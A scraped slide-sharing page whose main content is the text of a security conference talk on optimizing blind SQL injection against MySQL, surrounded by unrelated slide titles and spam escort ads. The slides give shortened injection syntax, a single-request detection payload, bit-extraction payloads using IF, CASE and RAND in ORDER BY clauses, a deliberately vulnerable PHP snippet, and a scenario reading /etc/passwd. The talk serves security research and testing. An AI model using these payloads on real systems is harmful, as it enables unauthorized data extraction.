Breaking the Kubernetes Kill Chain: Host Path Mount
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Harder Faster Stronger

  • 2. SELECT user FROM mysql.user LIMIT 2 • Security consultants working for Securus Global in Melbourne • Have done/are doing a lot a web pentesting • Research focus on web security: – Web Attacks – Web Application Scanners (WAS) testing – Web Application Firewall (WAF) testing – (In)Secure coding
  • 3. Why do we want to optimize SQL injections? • Stealth • Retrieving a large amount of data • Being faster • Because you’re bored using sqlmap • Because it’s fun
  • 4. What can be optimized? • Length of the injection • Number of requests to retrieve information – Optimize retrieval strategy – Optimizations on information
  • 5. Reducing injection length (MySQL) • SUBSTR() instead of SUBSTRING() • MID() instead of SUBSTR() • Using CRC32() – Instead of using the long string you replace it with the CRC32
  • 6. Reducing injection length (MySQL) • SELECT@@version instead of SELECT VERSION() • &&1 instead of AND 1=1 • &1 instead of &&1 • ||1 instead of OR 1=1 • |1 instead of ||1 (fails for NULL|1)
  • 7. Reducing injection length (MySQL) • !id instead of id=0 • > instead of <= (don’t forget to swap the
  • 8. String Retrieval • LENGTH('admin') = 5 – 5 * 7 bits = 35 requests • LENGTH(COMPRESS('admin')) = 17 – 17 * 7 bits = 119 requests
  • 9. Original vs Compressed • Based on CVE allitems.txt – about 47,000 VARCHAR(1000) SELECT ROUND(AVG( LENGTH(COMPRESS(SUBSTRING( text,1,N ))) )) FROM texts
  • 10.
  • 11.
  • 12. How to get 80 characters? SELECT COMPRESS(CONCAT_WS(':', id,name,age,address,password )) FROM users SELECT GROUP_CONCAT(user,password) FROM users; • 1024 Character limit
  • 13. Hash Retrieval • LENGTH(MD5('X')) = 32 – 32 * 7 bits = 224 requests • LENGTH(COMPRESS(MD5('X')) = 44 – 44 * 7 bits = 308 requests
  • 14. Hash Retrieval • Hash keyspace [0-9a-f] • LENGTH(UNHEX(MD5(‘X’))) = 16 – Need to retrieve all 8 bits – 16 x 8 bits = 128 requests
  • 15. Integer Retrieval • “131” → 3 x 7bits • 131 → 8 bits • Dichotomy search • Use CONV()
  • 16. Improving Detection • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • Really good payload to detect SQL injection in one request
  • 18. Using Markov • Given the current characters what is the next character most likely going to be • Learning from a list of table names, column names and data to get a model of the data • For each request check if the character is the one predicted before trying to retrieve his 7 bits
  • 19. Tree • Based on the information already retrieved guess the next characters • For example if I already retrieved RUX, the next character is likely to be C … for RUXCON • And if you don’t have anything in your tree matching, you can use markov
  • 22. Guessing process • You already have “RU”
  • 23. Statistics • No optimisation: 3345 • Markov: 3102 • Markov + Lowercase: 3006 • Markov + Lowercase + Tree: 1166 • Updating the tree when retrieving information can be used as well, but not always effective
  • 25. Vulnerability … $o = $_GET['order']; $sql = 'SELECT * FROM users'; $sql .= 'ORDER BY '; $sql .= mysql_real_escape_string($o); $result = mysql_sql($sql); …
  • 26. Exploitation • Slow brute force: – Blindly check each character against the alphabet • A bit better: IF (ASCII(substring((select @@version),1,1))&1, id, name) IF (ASCII(substring((select @@version),1,1))&2, id, name) IF (ASCII(substring((select @@version),1,1))&4, id, name) IF (ASCII(substring((select @@version),1,1))&8, id, name) IF (ASCII(substring((select @@version),1,1))&16, id, name) IF (ASCII(substring((select @@version),1,1))&32, id, name) IF (ASCII(substring((select @@version),1,1))&64, id, name) IF (ASCII(substring((select @@version),2,1))&1, id, name)
  • 27. Exploitation • Blind SQLi: 2 states • We can do better... – Let say we have 4 columns: => 4 states – order by can sort by multiple columns: “order by firstname, lastname” => more states (8 if lucky) – Color Blind SQLi (copyright Nicolas Collignon)
  • 28. Exploitation • For each combinations of order by: – fingerprint the response (with cast for id) – md5 for global warming • SQL has a case statement: CASE (ASCII(substring((select @@version),1,1))&4) WHEN 0 then column1 WHEN 1 then column2 WHEN 2 then column3 WHEN 3 then column4 END
  • 29. Exploitation ## Retrieving ----XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC © Securus Global 2010
  • 30. Exploitation SELECT id,username FROM users id username 1 admin 2 moderator 3 guest
  • 31. Exploitation SELECT id,username FROM users ORDER BY RAND() id username 2 moderator 1 admin 3 guest
  • 32. Exploitation SELECT id,username FROM users ORDER BY RAND() id username 3 guest 2 moderator 1 admin
  • 33. Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
  • 34. Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
  • 35. Exploitation RAND seed Order of id 0 1,2,3 1 3,1,2 2 2,3,1 3 3,2,1 4 1,2,3
  • 36. Exploitation RAND seed Order of id Bits 0 1,2,3 00 1 3,1,2 01 2 2,3,1 10 3 3,2,1 11
  • 37. Exploitation RAND( CONV( CONCAT( IF((true/false),0,1), IF((true/false),0,1) ) ,2,10 ) )
  • 39. Statistics Rows Bits 2-6 1 7 5 8 5 9 9 10 11 11 12 12 13 13 17
  • 40. Real World Scenario • 7 rows • Can retrieve 5 bits per request • 1830 characters (14640 bits) in /etc/passwd • Retrieve with 2930 requests • 740 characters for compressed /etc/passwd • Retrieved with 1186 requests
  • 41.
  • 42. Source available tomorrow at: https://github.com/lukejahnke